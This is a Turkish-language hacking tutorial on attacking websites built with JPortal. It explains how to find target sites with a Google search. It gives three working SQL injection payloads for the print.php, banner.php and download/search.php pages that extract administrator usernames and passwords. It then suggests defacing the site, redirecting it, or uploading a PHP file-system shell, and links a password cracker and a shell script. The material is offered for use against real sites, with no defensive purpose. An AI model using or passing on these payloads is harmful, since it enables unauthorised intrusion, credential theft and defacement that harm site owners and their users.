JPortal Sql Injection

   Jportal ile yapilmis olan sitelere sql enjekte etmeyi anlatacagim.Bunun için ilk önce google den Jportal ile yapilmis olan siteleri bulacagiz.Bunun için de google de “powered by Jportal” filetype:php yazmaniz yeterli olacaktir.(Sitelerin %98 i pl oldugu için arama yaparken ülke belirtmenize gerek yok.Yok ben illede yazacagim diyorsaniz site:com net org veya pl :) )

Sitemizi bulduk simdi bunu hacklemek için 3 tane yöntemimiz var.Ben kolay olani ile baslamak istiyorum.(Ben bayagi sömürdüm kalanlar ile idare edin :) )

1.Açigimiz...(Benim Tavsiye Ettigim)

http://Hedefsite/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

2.Açigimiz...

http://Hedefsite/banner.php sitemize gidip oradaki bölüme assagidaki kodu yazarak admin sifresine ulasabiliriz.

’ UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where ’1=1

’ UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where ’1=1

3.Açigimiz

http://Hedefsite/download.php veya http://Hedefsite/search.php sitemize gidip oradaki bölüme assagidaki kodlari yazarak da admin sifresine ulasabiliriz.

a%’ UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/*

Bunlar ile neler yapabilirim?

http://Hedefsite/admin.php adresinden admin girisi yaptiktan sonra ister baska siteye yönlendirin, Ister haber(Newsy) bölümünden Haber ekleyin ana safyada yayimlansin bu size kalmis.Ayrica haber bölümünde Upload yeri var buraya da istediginiz index i upload edebilirsiniz veya bir php Fso ile sistemede siza bilirsiniz gelistirmek size kalmis...

Not: Admin sifresi Çogunlukla normal gözükmesine karsi bazi sitelerde md5 ile sifrelenmis olarak çikabilmektedir.

Selametle... by Z@M@N

Md5 sifresini çözücü

 http://www.oxid.it/cain.html

 Fso Script

 http://www.geocities.com/Cyberhaberci/dokuman/casus15.txt